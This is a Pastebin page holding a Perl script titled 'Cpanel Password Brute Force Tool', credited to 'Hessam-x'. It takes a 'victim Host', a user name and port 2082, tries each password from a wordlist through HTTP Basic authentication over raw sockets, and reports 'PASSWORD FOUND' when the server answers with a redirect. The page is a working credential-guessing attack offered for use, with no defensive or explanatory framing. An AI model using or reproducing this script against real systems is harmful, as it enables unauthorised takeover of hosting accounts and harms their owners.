Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use IO::Socket;
- use LWP::Simple;
- use MIME::Base64;
- $host = $ARGV[0];
- $user = $ARGV[1];
- $port = $ARGV[2];
- $list = $ARGV[3];
- $file = $ARGV[4];
- $url = "http://".$host.":".$port;
- if(@ARGV < 3){
- print q(
- ##################################
- # Cpanel Password Brute Force Tool #
- ##########################
- # usage : cpanel.pl [HOST] [User] [PORT]
- [list] [File] #
- #-------------------------------------------------------------#
- # [Host] : victim Host (simorgh-ev.com) #
- # [User] : User Name (demo) #
- # [PORT] : Port of Cpanel (2082) #
- #
- [list] : File Of password list (list.txt) #
- # [File] : file for save password (password.txt) #
- # ###################################
- # (c)oded By Hessam-x / simorgh-ev.com ############################
- );exit;}
- headx();
- $numstart = "-1";
- sub headx() {
- print q(
- ################
- # Cpanel Password Brute Force Tool #
- # (c)oded By Hessam-x / simorgh-ev.com #
- #############################
- );
- open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
- @PASSWORDS = <PASSFILE>;
- close PASSFILE;
- foreach my $P (@PASSWORDS) {
- chomp $P;
- $passwd = $P;
- print "
- [~] Try Password : $passwd
- ";
- &brut;
- };
- }
- sub brut() {
- $authx = encode_base64($user.":".$passwd);
- print $authx;
- my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
- [-] Can not connect to the host";
- print $sock "GET / HTTP/1.1
- ";
- print $sock "Authorization: Basic $authx
- ";
- print $sock "Connection: Close
- ";
- read $sock, $answer, 128;
- close($sock);
- if ($answer =~ /Moved/) {
- print "
- [~] PASSWORD FOUND : $passwd
- ";
- exit();
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement